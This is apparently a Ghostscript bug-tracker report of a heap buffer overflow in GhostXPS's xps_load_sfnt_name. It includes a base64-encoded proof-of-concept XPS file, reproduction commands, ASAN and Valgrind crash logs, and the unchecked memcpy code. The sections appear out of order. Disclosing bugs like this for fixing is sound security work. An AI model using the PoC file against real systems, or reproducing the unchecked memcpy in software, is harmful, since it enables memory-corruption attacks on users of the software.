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
5QAAAD0BAAAkAAAAAAAAAAEAIAAAAMQDAABEb2N1bWVudHMvMS9QYWdlcy9fcmVscy8xLmZwYWdl
LnJlbHNQSwECFAAUAAAACAC8Pu00EJq9FXYAAACgAAAAGwAAAAAAAAABACAAAADrBAAARml4ZWRE
b2N1bWVudFNlcXVlbmNlLmZkc2VxUEsBAhQACgAAAAAAZ3czNQAAAAAAAAAAAAAAAAoAAAAAAAAA
AAAQAAAAmgUAAFJlc291cmNlcy9QSwECFAAUAAAACAANWiw1GacENsJjAACkaAEANAAAAAAAAAAA
ACAAAADCBQAAUmVzb3VyY2VzLzg3MGQyMjRhLTY0MzItNDA2Zi05YmJiLWNmNTQ1MjBjYTEzMi5P
RFRURlBLAQIUABQAAAAIAA1aLDWSb7AeBQEAAKYCAAATAAAAAAAAAAEAIAAAANZpAABbQ29udGVu
dF9UeXBlc10ueG1sUEsBAhQACgAAAAAAZ3czNQAAAAAAAAAAAAAAAAYAAAAAAAAAAAAQAAAADGsA
AF9yZWxzL1BLAQIUABQAAAAIALw+7TSJ5HhyzQAAAB4BAAALAAAAAAAAAAEAIAAAADBrAABfcmVs
cy8ucmVsc1BLBQYAAAAADQANAG4DAAAmbAAAAAA=
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.xps
valgrind ./gxps sDEVICE=pgmraw -r150 -dTextAlphaBits=4 -o /tmp/output.out
-dBATCH -dNOPAUSE PoC.xps
ASAN Report (ghostpdl needs to compiled with -fsanitize=address for this):
./xps/xpsresource.c:181: xps_parse_resource_dictionary(): empty resource
dictionary
./xps/xpszip.c:185: xps_read_zip_entry(): truncated zipfile entry; possibly
corrupt data
=================================================================
==24902==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x632000023172 at pc 0x65c81a103792 bp 0x7428860d5ec0 sp 0x7428860d5680
READ of size 44554 at 0x632000023172 thread T0
#0 0x65c81a103791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
#1 0x27a7e91 in xps_load_sfnt_name xps/xpsfont.c:214
#2 0x27b2066 in xps_init_truetype_font xps/xpsttf.c:381
#3 0x27a6b2e in xps_new_font xps/xpsfont.c:83
#4 0x27a40e1 in xps_parse_glyphs xps/xpsglyphs.c:720
#5 0x276f044 in xps_parse_canvas xps/xpspage.c:99
#6 0x2770256 in xps_parse_fixed_page xps/xpspage.c:274
#7 0x27637d7 in xps_read_and_process_page_part xps/xpszip.c:536
#8 0x27637d7 in xps_process_file xps/xpszip.c:685
#9 0x4b5662 in xps_imp_process_file xps/xpstop.c:307
#10 0x2a262ca in pl_main_aux pcl/pl/plmain.c:470
#11 0x65c818c63b44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#12 0x4b433c (/home/ghostxps/ghostpdl-9.20/debugbin/gxps+0x4b433c)
AddressSanitizer can not describe address in more detail (wild memory access
suspected).
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
0x0c647fffc5d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc5e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc5f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c647fffc620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa
0x0c647fffc630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c647fffc670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==24902==ABORTING
Valgrind report:
==20801== Memcheck, a memory error detector
==20801== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==20801== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==20801== Command: /home/ghostxps/ghostpdl-git/ghostpdl/debugbin/gxps
-sDEVICE=pgmraw -r150 -dTextAlphaBits=4 -o /tmp/crapp131p2.pdf -dBATCH
-dNOPAUSE /tmp/PoC.xps
==20801==
./xps/xpsresource.c:181: xps_parse_resource_dictionary(): empty resource
dictionary
./xps/xpszip.c:185: xps_read_zip_entry(): truncated zipfile entry; possibly
corrupt data
==20801== Invalid read of size 2
==20801== at 0x4C2D988: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==20801== by 0xA27E66: xps_load_sfnt_name (xpsfont.c:214)
==20801== by 0xA29C1C: xps_init_truetype_font (xpsttf.c:384)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== Address 0x71f4ab2 is 49,122 bytes inside a block of size 65,664
free'd
==20801== at 0x4C29E90: free (vg_replace_malloc.c:473)
==20801== by 0x8AE1DC: gs_heap_free_object (gsmalloc.c:354)
==20801== by 0x694C98: chunk_mem_node_remove (gsmchunk.c:403)
==20801== by 0x695509: chunk_free_object (gsmchunk.c:654)
==20801== by 0xA13AE6: xps_read_zip_entry (xpszip.c:180)
==20801== by 0xA144C5: xps_read_zip_part (xpszip.c:341)
==20801== by 0xA14B98: xps_read_part (xpszip.c:500)
==20801== by 0xA26D81: xps_parse_glyphs (xpsglyphs.c:701)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801==
==20801== Invalid read of size 2
==20801== at 0x4C2D996: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==20801== by 0xA27E66: xps_load_sfnt_name (xpsfont.c:214)
==20801== by 0xA29C1C: xps_init_truetype_font (xpsttf.c:384)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== Address 0x71f4ab6 is 49,126 bytes inside a block of size 65,664
free'd
==20801== at 0x4C29E90: free (vg_replace_malloc.c:473)
==20801== by 0x8AE1DC: gs_heap_free_object (gsmalloc.c:354)
==20801== by 0x694C98: chunk_mem_node_remove (gsmchunk.c:403)
==20801== by 0x695509: chunk_free_object (gsmchunk.c:654)
==20801== by 0xA13AE6: xps_read_zip_entry (xpszip.c:180)
==20801== by 0xA144C5: xps_read_zip_part (xpszip.c:341)
==20801== by 0xA14B98: xps_read_part (xpszip.c:500)
==20801== by 0xA26D81: xps_parse_glyphs (xpsglyphs.c:701)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801==
==20801== Invalid write of size 2
==20801== at 0x4C2D98B: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==20801== by 0xA27E66: xps_load_sfnt_name (xpsfont.c:214)
==20801== by 0xA29C1C: xps_init_truetype_font (xpsttf.c:384)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== Address 0x6d25a70 is 0 bytes after a block of size 65,664 alloc'd
==20801== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==20801== by 0x8ADAC2: gs_heap_alloc_bytes (gsmalloc.c:189)
==20801== by 0x6949F9: chunk_mem_node_add (gsmchunk.c:341)
==20801== by 0x694E16: chunk_obj_alloc (gsmchunk.c:450)
==20801== by 0x695166: chunk_alloc_bytes_immovable (gsmchunk.c:545)
==20801== by 0x8C8DB5: gs_fapi_init (gxfapi.c:1942)
==20801== by 0x8A6487: gs_lib_init1 (gsinit.c:61)
==20801== by 0xAA1D75: pl_main_aux (plmain.c:270)
==20801== by 0xAA2B2F: pl_main (plmain.c:597)
==20801== by 0xAA1BB6: main (realmain.c:21)
==20801==
==20801== Invalid read of size 1
==20801== at 0x4C2C1B4: strlen (vg_replace_strmem.c:412)
==20801== by 0xA29C2E: xps_init_truetype_font (xpsttf.c:385)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== by 0xA019EF: pl_process_file (pltop.c:138)
==20801== Address 0x6d25a70 is 0 bytes after a block of size 65,664 alloc'd
==20801== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==20801== by 0x8ADAC2: gs_heap_alloc_bytes (gsmalloc.c:189)
==20801== by 0x6949F9: chunk_mem_node_add (gsmchunk.c:341)
==20801== by 0x694E16: chunk_obj_alloc (gsmchunk.c:450)
==20801== by 0x695166: chunk_alloc_bytes_immovable (gsmchunk.c:545)
==20801== by 0x8C8DB5: gs_fapi_init (gxfapi.c:1942)
==20801== by 0x8A6487: gs_lib_init1 (gsinit.c:61)
==20801== by 0xAA1D75: pl_main_aux (plmain.c:270)
==20801== by 0xAA2B2F: pl_main (plmain.c:597)
==20801== by 0xAA1BB6: main (realmain.c:21)
==20801==
==20801== Invalid read of size 8
==20801== at 0x8C881A: gs_fapi_passfont (gxfapi.c:1782)
==20801== by 0xA2C44C: xps_fapi_passfont (xpsfapi.c:203)
==20801== by 0xA29DCC: xps_init_truetype_font (xpsttf.c:419)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801== Address 0xf1f1f1f1f1f1f1f9 is not stack'd, malloc'd or (recently)
free'd
==20801==
==20801==
==20801== Process terminating with default action of signal 11 (SIGSEGV)
==20801== General Protection Fault
==20801== at 0x8C881A: gs_fapi_passfont (gxfapi.c:1782)
==20801== by 0xA2C44C: xps_fapi_passfont (xpsfapi.c:203)
==20801== by 0xA29DCC: xps_init_truetype_font (xpsttf.c:419)
==20801== by 0xA2792A: xps_new_font (xpsfont.c:79)
==20801== by 0xA26E62: xps_parse_glyphs (xpsglyphs.c:711)
==20801== by 0xA18C1A: xps_parse_element (xpscommon.c:68)
==20801== by 0xA1745E: xps_parse_canvas (xpspage.c:99)
==20801== by 0xA18C54: xps_parse_element (xpscommon.c:70)
==20801== by 0xA17E09: xps_parse_fixed_page (xpspage.c:279)
==20801== by 0xA14CF7: xps_read_and_process_page_part (xpszip.c:539)
==20801== by 0xA15574: xps_process_file (xpszip.c:688)
==20801== by 0x463015: xps_imp_process_file (xpstop.c:307)
==20801==
==20801== HEAP SUMMARY:
==20801== in use at exit: 1,500,020 bytes in 83 blocks
==20801== total heap usage: 690 allocs, 607 frees, 5,173,051 bytes allocated
==20801==
==20801== LEAK SUMMARY:
==20801== definitely lost: 0 bytes in 0 blocks
==20801== indirectly lost: 0 bytes in 0 blocks
==20801== possibly lost: 66,968 bytes in 10 blocks
==20801== still reachable: 1,433,052 bytes in 73 blocks
==20801== suppressed: 0 bytes in 0 blocks
==20801== Rerun with --leak-check=full to see details of leaked memory
==20801==
==20801== For counts of detected and suppressed errors, rerun with: -v
==20801== ERROR SUMMARY: 22406 errors from 5 contexts (suppressed: 0 from 0)
Bug ID: 697629
Summary: BO in xps_load_sfnt_name function
Product: GhostXPS
Version: master
Hardware: PC
OS: Windows NT
Status: UNCONFIRMED
Severity: normal
Priority: P4
Component: General
Assignee: ***@artifex.com
Reporter: ***@gmail.com
QA Contact: gs-***@ghostscript.com
Word Size: ---
Created attachment 13441
--> http://bugs.ghostscript.com/attachment.cgi?id=13441&action=edit
bug report
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 && make debug
Machine Type: x86_64-unknown-linux-gnu
ghostpdl Version: Version: 9.21 Build date: Thu Feb 23 19:15:08 2017
Release Status: release
Source: git://git.ghostscript.com/ghostpdl.git)
Description:
A buffer overflow was detect in xps_load_sfnt_name function xps/xpsfont.c in
source file. The vulerability exists because memcpy operation does not verify
the lenght and offset parameters.
Affected code:
207 /* Full font name or postscript name */
208 if (nameid == 4 || nameid == 6)
209 {
210 if (pid == 1 && eid == 0 && langid == 0) /* mac roman, english
*/
211 {
212 if (found < 3)
213 {
214 memcpy(namep, namedata + stringoffset + offset,
length);
215 namep[length] = 0;
216 found = 3;
217 }
218 }
PoC.xps base64 encoded:
UEsDBAoAAAAAAGd3MzUAAAAAAAAAAAAAAAAKAAAARG9jdW1lbnRzL1BLAwQKAAAAAABndzM1AAAA
AAAAAAAAAAAADAAAAERvY3VtZW50cy8xL1BLAwQUAAAACAC8Pu00IumAmmsAAAB5AAAAHgAAAERv
Y3VtZW50cy8xL0ZpeGVkRG9jdW1lbnQuZmRvY3u/e7+NW2ZFaopLfnJpbmpeiUJFbk5esa1SRklJ
